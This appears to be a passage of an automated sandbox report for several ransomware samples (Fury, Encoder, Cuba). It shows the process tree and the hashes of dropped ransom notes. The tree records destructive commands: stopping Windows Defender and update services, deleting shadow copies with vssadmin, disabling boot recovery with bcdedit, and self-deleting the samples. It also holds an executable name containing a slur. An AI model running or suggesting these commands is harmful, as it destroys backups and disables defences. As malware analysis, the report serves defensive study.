                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                          2⤵
                                                                                            PID:3396
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                            2⤵
                                                                                              PID:2976
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                              2⤵
                                                                                                PID:4624
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                2⤵
                                                                                                  PID:1892
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                  2⤵
                                                                                                    PID:548
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                    2⤵
                                                                                                      PID:1100
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                      2⤵
                                                                                                        PID:3268
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                        2⤵
                                                                                                          PID:2316
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                          2⤵
                                                                                                            PID:5020
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                            2⤵
                                                                                                              PID:2912
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                              2⤵
                                                                                                                PID:4628
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                2⤵
                                                                                                                  PID:4336
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                  2⤵
                                                                                                                    PID:1876
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                    2⤵
                                                                                                                      PID:2172
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                      2⤵
                                                                                                                        PID:3968
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                        2⤵
                                                                                                                          PID:2572
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                          2⤵
                                                                                                                            PID:2300
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                            2⤵
                                                                                                                              PID:1196
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                              2⤵
                                                                                                                                PID:2976
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                2⤵
                                                                                                                                  PID:548
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                  2⤵
                                                                                                                                    PID:3268
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                    2⤵
                                                                                                                                      PID:4556
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                      2⤵
                                                                                                                                        PID:4004
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                        2⤵
                                                                                                                                          PID:3324
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                          2⤵
                                                                                                                                            PID:3688
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                            2⤵
                                                                                                                                              PID:5000
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                              2⤵
                                                                                                                                                PID:2072
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                2⤵
                                                                                                                                                  PID:2712
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1996
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                    2⤵
                                                                                                                                                      PID:3332
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4988
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2316
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4540
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4784
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                              2⤵
                                                                                                                                                                PID:3968
                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1720
                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1240
                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1428
                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1876
                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:1592
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3340
                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:208
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2476
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5000
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2712
                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2316
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:2444
                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:3308
                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:856
                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2064
                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:1312
                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1596
                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2020
                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4888
                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1892
                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:4004
                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:3964
                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:3324
                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:1060
                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:4336
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2072
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:3996
                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:3340
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2072
                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1060
                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:3132
                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:3508
                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:3844
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:548
                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:2360
                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1196
                                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:2728
                                                                                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:4520
                                                                                                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\Windows\System32\niggaaaahax.exe>nul
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:3968
                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c cls
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4340
                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Fury.rl-1a06f471877254c9224c600528bf2c69fa0a6f9f44f75b55170c4858905ee3d3.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Fury.rl-1a06f471877254c9224c600528bf2c69fa0a6f9f44f75b55170c4858905ee3d3.exe"
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                              • Checks computer location settings
                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                                                                              • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                              • NTFS ADS
                                                                                                                                                                                                                                              PID:4024
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C sc stop VVS
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:1428
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C sc stop wscsvc
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:3820
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C sc stop WinDefend
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                    PID:2608
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                      sc stop WinDefend
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Launches sc.exe
                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                      PID:3068
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C sc stop wuauserv
                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                      PID:2728
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C sc stop BITS
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:744
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C sc stop ERSvc
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:4628
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                          sc stop ERSvc
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Launches sc.exe
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          PID:2316
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C sc stop WerSvc
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                        PID:1876
                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:2172
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                            sc stop WerSvc
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            PID:2444
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C vssadmin.exe Delete Shadows /All /Quiet
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                          PID:1496
                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:4780
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled No
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            PID:2572
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                            PID:1936
                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Encoder.nxp-32aad8ac1e3515a051245f20f2c2d829aa05b6bd6be37d70ee49076f8dfe1400.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Encoder.nxp-32aad8ac1e3515a051245f20f2c2d829aa05b6bd6be37d70ee49076f8dfe1400.exe"
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                          PID:4868
                                                                                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                                            cmd.exe /C Del /f /q "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Encoder.nxp-32aad8ac1e3515a051245f20f2c2d829aa05b6bd6be37d70ee49076f8dfe1400.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:2476
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:3324
                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Cuba.e-1f8bfcdc5f4c24dd94c93d4bd3440960dc7f84ddf61771fc111a393ec149ace4.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Cuba.e-1f8bfcdc5f4c24dd94c93d4bd3440960dc7f84ddf61771fc111a393ec149ace4.exe"
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              PID:2864
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                /c del C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Cuba.e-1f8bfcdc5f4c24dd94c93d4bd3440960dc7f84ddf61771fc111a393ec149ace4.exe >> NUL
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:3232
                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Cuba.e-1f8bfcdc5f4c24dd94c93d4bd3440960dc7f84ddf61771fc111a393ec149ace4.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Cuba.e-1f8bfcdc5f4c24dd94c93d4bd3440960dc7f84ddf61771fc111a393ec149ace4.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4004
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    /c del C:\Users\Admin\Desktop\00480\Trojan-Ransom.Win32.Cuba.e-1f8bfcdc5f4c24dd94c93d4bd3440960dc7f84ddf61771fc111a393ec149ace4.exe >> NUL
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:5212
                                                                                                                                                                                                                                                                  • C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                                    "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\+REcovER+kwixt+.png" /ForceBootstrapPaint3D
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:6820
                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:4492
                                                                                                                                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5224
                                                                                                                                                                                                                                                                        • C:\Windows\system32\mspaint.exe
                                                                                                                                                                                                                                                                          "C:\Windows\system32\mspaint.exe"
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:1008
                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:2712
                                                                                                                                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:3068
                                                                                                                                                                                                                                                                              • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:2944

                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\84e5c081\jusched.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  199KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  c5063b3ea96594781d69bd24cb3eeb80

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  cf72a537e8b09b38af314b64fb381bb69bc6aee8

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  8b85d1968bba3519bf13dd9f50fe002af8c4c188e236b7b72a1db3935769b331

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  af64423fd3ce44e07494995f71477cfe394ea6b5813732fa9a4da7098c4f2c984f218cae19eaf74fc93bd146d1832a137283bdc2593dad447cbf4a62c7bd0960

                                                                                                                                                                                                                                                                                • C:\Program Files\7-Zip\Lang\+REcovER+kwixt+.png

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  37KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  2d8650b39df7a4f49ca3ad48a46455ba

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  b2feec98c13f4319c998eeb6198dafd81e663ae6

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  5ac35bc8e4284b3d4397246fae80614c200523f7b497e907cf7f9cabdbe2c9c5

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  21fad3bfc98915beb5e0a934f28aca1b04780c82d78da6ce6fbd8d8120581825009aa79b70ed383e3c4f8d608cd2ad65558f604bbb499a785b5ead559e718195

                                                                                                                                                                                                                                                                                • C:\Program Files\7-Zip\Lang\+REcovER+kwixt+.txt

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  7e2d4491b550ec29690d6ec25c062086

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  8f00998d09940e71c292a4146ba3ed70782f6098

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  ddbccd7f5e9f9eceb16379fa8291263bb281dc4d9d3cfca4486f6fc203ad016a

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  617a8314baa38daf78881700a039dd337957401ddd7693a154fbf334bebcbec13018297941fde9c82b4721cea8a98da24511136d10e1da8535791b79988707de

                                                                                                                                                                                                                                                                                • C:\Program Files\Common Files\DESIGNER\!! READ ME !!.txt

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  681B

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  68a39e30f21f19b436acd13ea6d90155

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  0f7e7865ed84143511b172117174d249478cdda0

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  204bf4993c33b24ba179afb6812de11fdef67ed311feabc1681cf9b4da75cba6

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  d44ef05aa10af66f44fed8c9bb61ea23e01f9dded7a837b333b3e6b4b8d5e53e71c55aa7258c01a714a41c3f2d564bf781a2c7b2c74d8d3e5c740439e7091ebb

                                                                                                                                                                                                                                                                                • C:\Program Files\_HELP_INSTRUCTION.TXT

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  584B

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  10830d688264da726734458426d679a6

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  f8e714a2a8619e0903560a973ad7fe9f5ead7958

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  b2c62634c2d4d11b952336983bd374316bb541c512d4a4172fe3edc89e77b8c7

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  c4b9528f977462ea28dd6ae1dac5e9161a496890e6781e3bc6d32e76470d27db01659e1c23d6419bae65e0219876b8c2176ab55eb1d8eb564dad1ff0690af26a

                                                                                                                                                                                                                                                                                • C:\Users\+REcovER+kwixt+.png

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  37KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  b8ac012533d84698080ec2dc117f73d5

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  c997919e126ce3673c1826038abd0a1f903b4b1b

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  2cb758b8079cad72f1292314e2fe203facbd9cc035c723e11fa9d88cf0561473

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  dc762cb2e2c3a783509dfd5bf9e731f49d3a8529524df4021f99e29fde347029039230cd5e0d5fe7825cb6c04ef4a0469c87664829bafb5b8079ae70b8c86d56

                                                                                                                                                                                                                                                                                • C:\Users\+REcovER+kwixt+.txt

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  1KB

